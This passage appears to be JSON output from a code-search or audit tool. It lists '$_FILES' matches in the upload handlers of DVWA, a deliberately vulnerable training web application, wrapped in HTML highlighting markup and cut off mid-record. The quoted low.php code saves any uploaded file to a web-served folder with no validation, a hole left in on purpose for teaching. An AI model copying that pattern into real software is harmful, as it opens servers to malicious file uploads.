number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> 
<span class=\"token operator\">==</span> <span class=\"token string\">\"jpeg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 255,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span 
class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is it an image<span class=\"token operator\">?</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token punctuation\">(</span> <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"jpeg\"</span> || <span class=\"token function\">strtolower</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">==</span> <span class=\"token string\">\"png\"</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">16:</span> \t\t<span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_size</span> <span class=\"token 
operator\">&lt;</span> <span class=\"token number\">100000</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span>\n<span class=\"line-number\">17:</span> \t\t<span class=\"token function\">getimagesize</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_tmp</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 257,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span 
class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 258,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span>   <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 259,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span 
class=\"line-number\">12:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span>   <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span 
class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 260,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_ext</span>  <span class=\"token operator\">=</span> <span class=\"token function\">substr</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token function\">strrpos</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">+</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token 
variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t<span class=\"token variable\">$uploaded_tmp</span>  <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$target_path</span>   <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'hackable/uploads/'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span><span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$uploaded_name</span><span class=\"token punctuation\">,</span> 
<span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'-'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$target_file</span>   <span class=\"token operator\">=</span>  <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token function\">uniqid</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_name</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'.'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$uploaded_ext</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 266,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>Your image was not uploaded.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 267,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Can we move the file <span class=\"token keyword\">to</span> the upload folder<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">move_uploaded_file</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token 
punctuation\">[</span> <span class=\"token string\">'tmp_name'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">10:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> No\n<span class=\"line-number\">11:</span> \t\t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>Your image was not uploaded.&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t}\n<span class=\"line-number\">13:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">14:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Yes!",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 269,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Upload'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Where are we going <span class=\"token keyword\">to</span> be writing <span class=\"token keyword\">to</span><span class=\"token operator\">?</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$target_path</span>  <span class=\"token operator\">=</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"hackable/uploads/\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$target_path</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token function\">basename</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> \n<span 
class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> File information\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$uploaded_name</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$uploaded_type</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'type'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$uploaded_size</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_FILES</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'uploaded'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'size'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 270,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/upload/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_FILES",
